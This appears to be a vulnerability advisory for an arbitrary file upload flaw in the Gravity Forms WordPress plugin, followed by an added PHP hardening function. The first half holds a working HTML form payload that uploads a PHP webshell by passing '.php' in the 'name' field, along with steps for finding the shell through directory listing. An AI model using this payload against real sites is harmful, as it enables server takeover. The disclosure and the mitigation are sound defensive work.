<ul><li>/includes/upload.php</li></ul><pre>$file_name = isset($_REQUEST["name"]) ? $_REQUEST["name"] : '';
$field_id = rgpost("field_id");
$field = GFFormsModel::get_field($form, $field_id);
if ( empty( $field ) ) {
    die();
}
// Clean the fileName for security reasons
$file_name = preg_replace('/[^\w\._]+/', '_', $file_name);
…
$tmp_file_name = $form_unique_id . "_input_" . $field_id . "_" . $file_name;
$file_path = $target_dir . $tmp_file_name;
</pre><p>The user-supplied <code>name</code> parameter is concatenated into the file name without any check of its extension (the regex above only replaces characters outside <code>[\w._]</code>, so a value such as <code>.php</code> passes through unchanged), which bypasses the blacklist check and leads to arbitrary file upload.</p><p>Save the following payload as an HTML page:</p><pre>&lt;form action="http://10.211.55.3/wordpress/?gf_page=upload" method="post" enctype="multipart/form-data"&gt;
    &lt;input type="file" name="file"&gt;
    &lt;input type="text" name="name" value=".php"&gt;
    &lt;input type="text" name="field_id" value="1"&gt;
    &lt;input type="text" name="form_id" value="1"&gt;
    &lt;button type="submit"&gt;Submit&lt;/button&gt;
&lt;/form&gt;
</pre><p>Open it and upload a jpg file whose content is a PHP webshell:</p><p><img alt="E245C178-EC11-44DA-8B89-1B9EA23762F1.png" src="https://images.seebug.org/@/uploads/1433922080883-E245C178-EC11-44DA-8B89-1B9EA23762F1.png" data-image-size="608,107"></p><p>Upload:</p><p><img alt="FD8CF9E3-F581-437A-8299-A1406BF35AA5.png" src="https://images.seebug.org/@/uploads/1433922096082-FD8CF9E3-F581-437A-8299-A1406BF35AA5.png" data-image-size="607,92"></p><p>Visit the following URL:</p><pre>http://10.211.55.3/wordpress/wp-content/uploads/gravity_forms</pre><p>If directory listing is enabled, the exact address of the shell can be read from it:</p><p><img alt="CE575EA3-DED2-4718-A2C8-7B51EFF4E5A4.png" src="https://images.seebug.org/@/uploads/1433922115545-CE575EA3-DED2-4718-A2C8-7B51EFF4E5A4.png" data-image-size="588,223"></p>
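<p>As an added example from the defender's side (this is not Gravity Forms' own code; it assumes the upload field is <code>$_FILES['file']</code> as in the form above), a replacement for the vulnerable name construction that derives the stored name from the real upload and an extension allowlist instead of the free-form <code>name</code> parameter:</p>

```php
<?php
// Added hardening example, not Gravity Forms' own code. The stored file name is
// derived from the real upload ($_FILES entry), never from the free-form
// "name" request parameter that the vulnerable code concatenates unchecked.

// Allowlist: extension => MIME type the file content must actually have.
const ALLOWED_UPLOAD_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
    'pdf'  => 'application/pdf',
];

/**
 * Return a safe on-disk file name for an uploaded file, or null to reject it.
 * $form_unique_id and $field_id play the same role as in the original code;
 * $uploaded is the $_FILES['file'] entry (field name assumed from the page).
 */
function safe_upload_name(string $form_unique_id, string $field_id, array $uploaded): ?string
{
    if (($uploaded['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($uploaded['tmp_name'] ?? '')) {
        return null;
    }
    // Only the final extension of the uploaded file's own name is considered,
    // compared case-insensitively: ".php", "shell.php" and "shell.PHP" are
    // all rejected because "php" is not in the allowlist.
    $ext = strtolower(pathinfo(basename($uploaded['name'] ?? ''), PATHINFO_EXTENSION));
    if (!isset(ALLOWED_UPLOAD_TYPES[$ext])) {
        return null;
    }
    // Check the content, not the label: a plain PHP file renamed to .jpg fails
    // here. The allowlisted extension is what keeps the stored name non-executable.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($uploaded['tmp_name']);
    if ($mime !== ALLOWED_UPLOAD_TYPES[$ext]) {
        return null;
    }
    // Random basename: no user-controlled bytes reach the path at all.
    $prefix = preg_replace('/[^\w]/', '_', $form_unique_id . '_input_' . $field_id);
    return $prefix . '_' . bin2hex(random_bytes(8)) . '.' . $ext;
}

// Usage in the upload handler (hypothetical $target_dir as in the original code):
// $name = safe_upload_name($form_unique_id, $field_id, $_FILES['file']);
// if ($name === null) { http_response_code(400); exit; }
// move_uploaded_file($_FILES['file']['tmp_name'], $target_dir . $name);
```

<p>Disabling directory listing for <code>wp-content/uploads</code> removes the second half of the technique shown above, since the random basename is otherwise only discoverable by a listing.</p>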